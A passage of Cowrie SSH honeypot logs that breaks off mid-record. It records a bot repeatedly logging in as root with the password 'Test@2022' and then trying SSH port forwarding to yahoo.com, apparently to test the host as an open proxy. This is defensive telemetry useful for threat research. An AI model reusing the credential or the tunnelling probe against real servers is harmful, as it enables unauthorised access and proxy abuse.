{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:21.755515Z","src_ip":"213.209.150.239","session":"698d5238107b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:22.037768Z","src_ip":"213.209.150.239","session":"698d5238107b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":28574,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:28574","sensor":"my-vps","timestamp":"2025-08-26T01:02:22.095270Z","session":"698d5238107b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:22.152624Z","src_ip":"213.209.150.239","session":"698d5238107b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":19595,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:19595","sensor":"my-vps","timestamp":"2025-08-26T01:02:22.307068Z","session":"698d5238107b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:22.363760Z","src_ip":"213.209.150.239","session":"698d5238107b"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:22.421176Z","src_ip":"213.209.150.239","session":"698d5238107b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":22535,"dst_ip":"1.2.3.4","dst_port":22,"session":"359e6d81b88c","protocol":"ssh","message":"New connection: 213.209.150.239:22535 (1.2.3.4:22) [session: 359e6d81b88c]","sensor":"my-vps","timestamp":"2025-08-26T01:02:22.467212Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:22.467869Z","src_ip":"213.209.150.239","session":"359e6d81b88c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:22.515061Z","src_ip":"213.209.150.239","session":"359e6d81b88c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:22.748835Z","src_ip":"213.209.150.239","session":"359e6d81b88c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":6338,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:6338","sensor":"my-vps","timestamp":"2025-08-26T01:02:22.796839Z","session":"359e6d81b88c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:22.843909Z","src_ip":"213.209.150.239","session":"359e6d81b88c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":6632,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:6632","sensor":"my-vps","timestamp":"2025-08-26T01:02:22.981253Z","session":"359e6d81b88c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:23.028204Z","src_ip":"213.209.150.239","session":"359e6d81b88c"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:23.076034Z","src_ip":"213.209.150.239","session":"359e6d81b88c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":22590,"dst_ip":"1.2.3.4","dst_port":22,"session":"095e2c8bc6c4","protocol":"ssh","message":"New connection: 213.209.150.239:22590 (1.2.3.4:22) [session: 095e2c8bc6c4]","sensor":"my-vps","timestamp":"2025-08-26T01:02:23.131888Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:23.133048Z","src_ip":"213.209.150.239","session":"095e2c8bc6c4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:23.189685Z","src_ip":"213.209.150.239","session":"095e2c8bc6c4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:23.472075Z","src_ip":"213.209.150.239","session":"095e2c8bc6c4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":460,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:460","sensor":"my-vps","timestamp":"2025-08-26T01:02:23.529500Z","session":"095e2c8bc6c4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:23.586197Z","src_ip":"213.209.150.239","session":"095e2c8bc6c4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":26434,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:26434","sensor":"my-vps","timestamp":"2025-08-26T01:02:23.743016Z","session":"095e2c8bc6c4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:23.799705Z","src_ip":"213.209.150.239","session":"095e2c8bc6c4"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:23.857168Z","src_ip":"213.209.150.239","session":"095e2c8bc6c4"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":22643,"dst_ip":"1.2.3.4","dst_port":22,"session":"85a17467b9e4","protocol":"ssh","message":"New connection: 213.209.150.239:22643 (1.2.3.4:22) [session: 85a17467b9e4]","sensor":"my-vps","timestamp":"2025-08-26T01:02:23.912668Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:23.913540Z","src_ip":"213.209.150.239","session":"85a17467b9e4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:23.969956Z","src_ip":"213.209.150.239","session":"85a17467b9e4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:24.252344Z","src_ip":"213.209.150.239","session":"85a17467b9e4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":17138,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:17138","sensor":"my-vps","timestamp":"2025-08-26T01:02:24.310035Z","session":"85a17467b9e4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:24.366801Z","src_ip":"213.209.150.239","session":"85a17467b9e4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":30628,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:30628","sensor":"my-vps","timestamp":"2025-08-26T01:02:24.522918Z","session":"85a17467b9e4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:24.579535Z","src_ip":"213.209.150.239","session":"85a17467b9e4"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:24.636814Z","src_ip":"213.209.150.239","session":"85a17467b9e4"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":22706,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef306ea7abe7","protocol":"ssh","message":"New connection: 213.209.150.239:22706 (1.2.3.4:22) [session: ef306ea7abe7]","sensor":"my-vps","timestamp":"2025-08-26T01:02:24.692642Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:24.693417Z","src_ip":"213.209.150.239","session":"ef306ea7abe7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:24.750185Z","src_ip":"213.209.150.239","session":"ef306ea7abe7"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:25.032950Z","src_ip":"213.209.150.239","session":"ef306ea7abe7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":27076,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:27076","sensor":"my-vps","timestamp":"2025-08-26T01:02:25.092060Z","session":"ef306ea7abe7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:25.148851Z","src_ip":"213.209.150.239","session":"ef306ea7abe7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":2102,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:2102","sensor":"my-vps","timestamp":"2025-08-26T01:02:25.303112Z","session":"ef306ea7abe7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:25.360040Z","src_ip":"213.209.150.239","session":"ef306ea7abe7"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:25.417454Z","src_ip":"213.209.150.239","session":"ef306ea7abe7"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":22759,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3408665755f","protocol":"ssh","message":"New connection: 213.209.150.239:22759 (1.2.3.4:22) [session: c3408665755f]","sensor":"my-vps","timestamp":"2025-08-26T01:02:25.473092Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:25.473952Z","src_ip":"213.209.150.239","session":"c3408665755f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 